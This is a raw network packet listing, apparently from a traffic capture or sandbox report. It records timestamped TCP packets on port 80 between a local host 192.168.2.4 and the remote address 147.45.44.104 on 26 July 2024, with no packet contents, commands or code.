Jul 26, 2024 18:56:49.593089104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.593115091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.593168974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593179941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593189955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593199968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593216896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.593241930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.593544006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593555927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593564987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593574047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593584061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593585014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.593595982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593609095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593611956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.593621969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593633890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593641996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.593655109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.593683004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594188929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594199896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594209909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594219923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594229937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594238997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594249010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594250917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594259977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594268084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594269991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594281912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594294071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594302893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594304085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594316959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594320059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594329119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594345093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594372034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594901085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594912052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594921112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594930887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594940901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594949961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594955921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594964981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594968081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594979048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.594981909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.594990015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595000029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595009089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.595009089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595021963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595031977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595042944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.595042944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595057964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595062971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.595071077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595082998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.595107079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.595685959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595699072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595709085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595720053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595731020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595732927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.595742941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595752001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.595755100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595766068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.595768929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.595797062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.628603935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.628652096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.628663063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.628684044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.628684044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.628731966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.628870964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.628881931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.628892899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.628902912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.628912926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.628942013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.650726080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.650770903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.650782108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.650819063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.650907040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.650912046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.650924921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.650935888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.650948048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.650962114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.650980949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651011944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651580095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651591063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651599884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651612043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651623964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651634932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651644945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651645899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651659012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651669979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651670933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651690960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651726961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651726961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651882887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651895046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651905060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651915073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651925087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651935101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651935101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651972055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651972055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651972055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.651984930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.651998043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.652015924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.652026892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.652034044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.652034044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.652043104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.652055979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.652076006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.652100086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.668343067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.668375015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.668386936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.668446064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.668517113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.668529034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.668540001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.668553114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.668570042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.668605089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.668605089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.681812048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.681827068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.681838036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.681883097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.681894064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.681916952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.682089090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.682470083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682543993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.682563066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682574987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682641029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.682673931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682684898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682694912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682704926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682714939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682739019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.682792902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.682921886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682933092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.682982922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.684778929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.684797049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.684808016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.684883118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.684916973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.684984922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.684995890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685005903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685048103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.685101032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.685266972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685278893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685287952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685300112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685311079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685321093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685329914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685339928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685342073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.685352087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685363054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685446024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.685866117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685877085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685885906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685895920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685905933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685915947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685925961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685933113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.685939074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685950994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685960054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685970068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685978889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685991049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.685998917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.686002016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686009884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686089039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.686727047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686737061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686754942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686765909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686775923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686786890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686798096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686806917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686810970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.686820030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686830044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686841011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686850071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686860085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686868906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686878920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686880112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.686889887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.686954021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.687539101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.687552929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.687562943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.687572956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.687582970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.687593937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.687602997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.687609911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.687671900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.722249985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.722265959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.722278118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.722471952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.722481966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.722495079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.722506046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.722518921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.722712040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.745814085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.745891094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.745903015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.745954037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.745964050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.745976925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.745987892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746150017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.746328115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746340036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746350050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746360064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746371031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746381044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746392012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746400118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.746402979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746417046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746424913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.746444941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.746501923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.746731997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746745110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746753931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746766090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.746809006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.746860027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.747016907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.747028112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.747039080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.747049093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.747060061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.747068882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.747078896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.747101068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.747194052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.760967016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.761008024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.761018038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.761044025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.761053085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.761063099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.761073112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.761116982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.761116982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.761323929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.772569895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.772584915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.772595882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.772623062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.772631884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.772640944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.772653103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.772743940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.772833109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.773586988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.773646116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.773655891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.773718119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.773753881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.773765087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.773775101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.773783922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.773816109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.773874998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.775048018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775058031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775068045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775146008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.775166988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775177956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775188923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775197983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775245905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.775300026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.775347948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775357008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775367022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775420904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.775449038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775459051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775469065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775479078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775487900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775497913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.775499105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.775588989 CEST	49757	80	192.168.2.4	147.45.44.104
